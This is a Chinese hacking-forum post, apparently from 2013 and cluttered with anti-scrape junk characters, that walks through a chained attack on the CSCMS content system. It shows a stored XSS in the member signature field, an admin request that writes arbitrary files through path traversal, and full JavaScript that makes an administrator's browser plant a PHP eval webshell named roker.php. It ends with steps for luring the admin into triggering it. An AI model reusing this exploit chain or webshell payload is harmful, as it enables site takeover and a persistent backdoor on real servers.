|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题. P8 X! I2 r! N5 \/ e; Q, U# L: C* {
官网已经修补了,所以重新下了源码7 w" n. P7 H4 y& E: L) `9 ?
因为 后台登入 还需要认证码 所以 注入就没看了。
5 F! v; g+ [' Q存在 xss
4 |0 E B: T. _( }7 [$ z漏洞文件 user/member/skin_edit.php
& N7 O9 F# g7 H% {- Y本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
# |( {( W7 d6 ]' I0 x % k5 F0 L0 A8 u
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
& `* _; H1 x8 O7 I
1 l' D1 p9 v5 @, e</textarea></td></tr>) M" D, [* b. M) y2 {$ Z
+ n- o- e' M8 ~
user/do.php
& z- Q* Q, R( }8 M; h
) I2 M# Y8 V% [* i4 X' L" {! s1 F. N( E9 {% O
if($op=='zl'){ //资料- j- |$ \3 P& ^0 c8 K. i1 ]# i
' G X7 B. [# B# m/ Y N9 u
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) , ]( d+ e: a# l* S7 U* a# d
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));+ G) o; }* Q" |0 s7 h
7 x' S+ O" J' D' u $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',& n* P+ d+ C2 r) R# F$ j1 f
2 t$ i: c9 j3 D CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
7 o0 H% G# I9 c0 j Y3 q where CS_Name='".$cscms_name."'";6 `; y% }% ]6 [3 h! T* p
* Q6 s+ |, \5 b" j' y
if($db->query($sql)){
) B, [; g6 U7 D' G3 ]) w 4 ] v. W6 Z+ T. w
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
/ C# T0 b5 y: Q- d
7 ^4 L3 N# S& a) Q }else{
* a/ O2 E/ G. v8 R
6 f) o" q9 G5 Z# G; X! k exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));* I* }# q6 f8 G4 m
& s& e+ }1 Q4 x& ]
}
7 `5 H" I4 g$ _* a4 ?) P9 C8 n. G6 N6 x( C
1 v, Z) G; g7 c1 R# `- x
没有 过滤导致xss产生。; j6 u) \+ [+ e8 T. r
后台 看了下 很奇葩的是可以写任意格式文件。。
0 L% N5 ?7 {$ l4 L0 ~抓包。。
u/ W% {% k. R9 ~
! g$ Z6 F0 K0 M: Y# E0 D" d0 s/ d( {
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.10 z) E& t! b8 p& @
3 e3 ?9 _; m6 j8 X) x4 gAccept: text/html, application/xhtml+xml, */*0 r( O- r4 _) @8 T2 @4 A' d- B0 F
+ `7 M( d& A* |, ^& F7 ?Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php; u: T5 U% F* n, l+ C) @
* H, Z! [- p: o) |Accept-Language: zh-CN9 L: P" }( ]# p8 ]
b, `; `, C( {3 L( z3 E# M. k4 V; sUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)5 h' K$ w4 m) Y4 a5 ~5 q. T
- {8 J5 r, ?, }8 E; i- z) \
Content-Type: application/x-www-form-urlencoded
) L2 o, m: [, G0 C
+ f0 _8 F' S: Q5 B9 sAccept-Encoding: gzip, deflate
- D& u" ^$ f. {/ Z
& [" W1 r- o% L6 L; A+ p xHost: 127.0.0.14 ]3 }" I) |4 j+ Z
/ o( L* }( p0 p: }Content-Length: 38
' ]3 s# l. a8 g' }2 S* \
5 V( z# X5 E1 {( n9 q x4 y! A( HDNT: 1
- [$ m) o. {& I: i$ R6 m3 Q b% u# x. i- W2 \ \
Connection: Keep-Alive
! r9 u" r; x) C/ Y* `% S
: u: x9 D }) c* V, J& wCache-Control: no-cache
3 h7 w! C5 x" t8 I" I5 W& S % L3 g5 `& w! v/ d5 N* N
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
# W& L- q8 @1 n: b. m
1 F( N3 N ]2 P' U6 l
# }; j% K1 R' Vname=aaa.php&content=%3Cs%3E%3Ca%25%3E
/ f, U" g6 z/ {, W9 U7 g+ ?4 F: J3 _: b/ L) [* s9 H$ I
0 F" I/ ^8 [. T$ ~7 V6 Y F4 i
/ x9 |# ~3 k/ C; e; d于是 构造js如下。
" r2 V4 W; _% X( `+ v7 g, E
; q9 C9 {8 h( w2 r; N: y8 b1 h本帖隐藏的内容<script>
# @/ d8 m% a% Q' N, ~8 u1 g tthisTHost = top.location.hostname;! z0 [2 d$ H. f) }$ \
/ M+ @2 C4 [9 ?, W
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
6 _6 |- M. e" s2 C " S9 r# ?3 c# z! ]+ y: R
function PostSubmit(url, data, msg) { * I5 F# r7 h# C! {
var postUrl = url;( V q! U6 i: G4 ~/ i7 V ^: Q
- O _9 w6 @7 k0 S$ C; T
var postData = data; O( e$ ^+ \1 j& D6 }; o
var msgData = msg;
4 H8 E9 X! P& b) `7 V3 y var ExportForm = document.createElement("FORM"); ) H; ?" Q2 G4 G4 J. ~8 [6 \5 }# L
document.body.appendChild(ExportForm);
! x, }5 v: A$ s; L% j ExportForm.method = "POST";
6 E5 q% L& m% Y! Q6 @ var newElement = document.createElement("input"); ! A( G6 [5 Y! D. d- I; b5 F
newElement.setAttribute("name", "name");
$ b' P+ Y! m, T! z1 Q v newElement.setAttribute("type", "hidden"); ( s! s% |: U3 ?6 a+ {
var newElement2 = document.createElement("input");
) L4 F, Q. y" v4 p$ }& b newElement2.setAttribute("name", "content");
9 i' t) ]3 N6 n2 j3 g newElement2.setAttribute("type", "hidden");
3 A: U& h3 p2 u. q! b# X$ K ExportForm.appendChild(newElement);
- B4 z5 o6 S+ I S# q! I6 ? ExportForm.appendChild(newElement2);
6 F/ V9 I& V6 F3 j! U newElement.value = postData;
6 k: |1 r# l* \* m- v newElement2.value = msgData; ' O8 ? \/ N; L/ v
ExportForm.action = postUrl; 3 L6 S8 M# j& U( x+ l: ^8 \
ExportForm.submit(); 6 H3 L% r$ G$ m% F6 F) W5 B
};3 V2 V$ h {: U! y) P4 ?( C
8 y9 u. s: Q+ I, b8 h, @7 H
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
+ G g% Q. F! h2 L ' d; \9 p/ J, u v7 M
</script>; h! ?$ \+ W2 D0 E! a" Q0 g
8 r! U) W# j$ t1 d; S9 z9 D* ~% ~
3 @& F3 n9 r7 r5 B3 v/ G, C' }1 u+ f, J! L1 e% ~$ S
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入4 h/ ~% \; H5 K
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
" ~# B5 n' ?* @ T就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
/ r6 b2 u. o% R9 X6 {' }% v b* x
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对